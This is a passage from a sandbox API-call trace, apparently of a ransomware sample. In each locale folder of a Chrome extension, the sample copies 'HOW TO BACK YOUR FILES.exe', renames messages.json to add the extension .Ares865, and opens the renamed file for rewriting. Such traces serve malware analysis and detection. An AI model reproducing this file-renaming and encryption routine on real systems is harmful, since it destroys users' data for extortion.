dwFlags=0x1) returned 1 [0102.206] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.207] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=225) returned 1 [0102.210] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th" [0102.211] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th" [0102.211] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.211] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.211] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.212] GetLastError () returned 0x0 [0102.212] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.212] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8420b140, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e978040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e978040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.212] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.212] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.212] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.212] lstrlenW (lpString="messages.json") returned 13 [0102.212] lstrlenW (lpString="Ares865") returned 7 [0102.212] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.212] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.Ares865") returned 160 [0102.213] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.214] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.214] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=266) returned 1 [0102.218] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv" [0102.218] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv" [0102.218] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.218] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.219] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.219] GetLastError () returned 0x0 [0102.219] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.219] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84203c10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e978040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e978040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.219] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.219] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.219] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.219] lstrlenW (lpString="messages.json") returned 13 [0102.219] lstrlenW (lpString="Ares865") returned 7 [0102.220] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.220] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.Ares865") returned 160 [0102.220] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.221] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.221] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=216) returned 1 [0102.225] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr" [0102.226] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr" [0102.226] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.226] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.226] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.227] GetLastError () returned 0x0 [0102.227] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.227] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x841fc6e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e978040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e978040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.227] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.227] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.227] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.227] lstrlenW (lpString="messages.json") returned 13 [0102.227] lstrlenW (lpString="Ares865") returned 7 [0102.227] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.227] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.Ares865") returned 160 [0102.228] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.229] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.229] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=236) returned 1 [0102.232] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl" [0102.232] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl" [0102.232] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.232] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.233] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.233] GetLastError () returned 0x0 [0102.233] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.233] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x841f51b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e99e1a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e99e1a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.234] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.234] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.234] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.234] lstrlenW (lpString="messages.json") returned 13 [0102.234] lstrlenW (lpString="Ares865") returned 7 [0102.234] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.234] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.Ares865") returned 160 [0102.234] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.235] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.236] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=222) returned 1 [0102.240] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk" [0102.240] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk" [0102.240] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.240] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.241] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.241] GetLastError () returned 0x0 [0102.241] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.241] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x841eb570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e99e1a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e99e1a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.241] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.241] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.241] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.242] lstrlenW (lpString="messages.json") returned 13 [0102.242] lstrlenW (lpString="Ares865") returned 7 [0102.242] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.242] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.Ares865") returned 160 [0102.242] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 